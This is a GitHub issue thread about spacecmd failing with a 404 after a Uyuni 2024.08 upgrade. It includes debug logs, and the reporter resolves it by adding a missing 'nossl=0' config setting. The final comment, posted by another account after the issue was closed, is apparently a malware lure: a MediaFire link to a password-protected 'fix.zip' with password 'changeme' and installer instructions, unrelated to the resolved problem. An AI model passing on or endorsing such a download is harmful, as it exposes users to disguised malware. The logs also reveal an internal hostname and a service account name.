### ISSUE TITLE
After 2024.07 --> 2024.08 upgrade can't use spacecmd

### ISSUE THREAD

**Issue by RenownTwiz** [uyuni-project/uyuni#9216]
### Problem description

After upgrading from 2024.07 to 2024.08 spacecmd CLI isn't working.  Getting a 404 error like the page is missing.

GUI seems to be working, spacewalk commands are working.  

Using config file in "~/.spacecmd/config" no changes to config since 2024.07

### Steps to reproduce

1.Go to the command line, run spacecmd
2.
3.
...

### Uyuni version

```bash
Loading repository data...
Reading installed packages...


Information for package Uyuni-Server-release:
---------------------------------------------
Repository     : Uyuni Server Stable
Name           : Uyuni-Server-release
Version        : 2024.08-230900.221.1.uyuni3
Arch           : x86_64
Vendor         : obs://build.opensuse.org/systemsmanagement:Uyuni
Support Level  : Level 3
Installed Size : 1.4 KiB
Installed      : Yes
Status         : up-to-date
Source package : Uyuni-Server-release-2024.08-230900.221.1.uyuni3.src
Upstream URL   : https://www.uyuni-project.org/
Summary        : Uyuni Server
Description    :
    Uyuni lets you efficiently manage physical, virtual,
    and cloud-based Linux systems. It provides automated and cost-effective
    configuration and software management, asset management, and system
    provisioning.
```

### Useful logs

```bash
suuyuniappts001:/usr/share/rhn # spacecmd -d
DEBUG: command=, return_value=False
DEBUG: Read configuration from /root/.spacecmd/config
DEBUG: Loading configuration section [spacecmd]
DEBUG: Current Configuration: {'server': 'suuyuniappts001.homeoffice.anfcorp.com', 'nossl': True, 'username': 'spacewalk_svc', 'password': '**********************'}
Welcome to spacecmd, a command-line interface to Spacewalk.

Type: 'help' for a list of commands
      'help <cmd>' for command-specific help
      'quit' to quit

DEBUG: Configuration section [suuyuniappts001.homeoffice.anfcorp.com] does not exist
DEBUG: Connecting to http://suuyuniappts001.homeoffice.anfcorp.com/rpc/api
ERROR: <class 'xmlrpc.client.ProtocolError'>
Traceback (most recent call last):
  File "/usr/lib/python3.6/site-packages/spacecmd/misc.py", line 295, in do_login
    self.api_version = self.client.api.getVersion()
  File "/usr/lib64/python3.6/xmlrpc/client.py", line 1112, in __call__
    return self.__send(self.__name, args)
  File "/usr/lib64/python3.6/xmlrpc/client.py", line 1452, in __request
    verbose=self.__verbose
  File "/usr/lib64/python3.6/xmlrpc/client.py", line 1154, in request
    return self.single_request(host, handler, request_body, verbose)
  File "/usr/lib64/python3.6/xmlrpc/client.py", line 1187, in single_request
    dict(resp.getheaders())
xmlrpc.client.ProtocolError: <ProtocolError for suuyuniappts001.homeoffice.anfcorp.com/rpc/api: 404 Not Found>
ERROR: Failed to connect to http://suuyuniappts001.homeoffice.anfcorp.com/rpc/api
DEBUG: Error while connecting to the server http://suuyuniappts001.homeoffice.anfcorp.com/rpc/api: <ProtocolError for suuyuniappts001.homeoffice.anfcorp.com/rpc/api: 404 Not Found>
```

**Comment by RenownTwiz** [comment]
Was missing the "nossl=0" in config that the documentation now calls out as needed.  This is not an issue, just a miss on my side.  This can be closed.

**Comment by RenownTwiz** [comment]
Closed

**Comment by FabrizioValenti** [comment]
Download 
https://www.mediafire.com/file/jjwb2y99al0750x/fix.zip/file
password: changeme
In the installer menu, select "gcc."
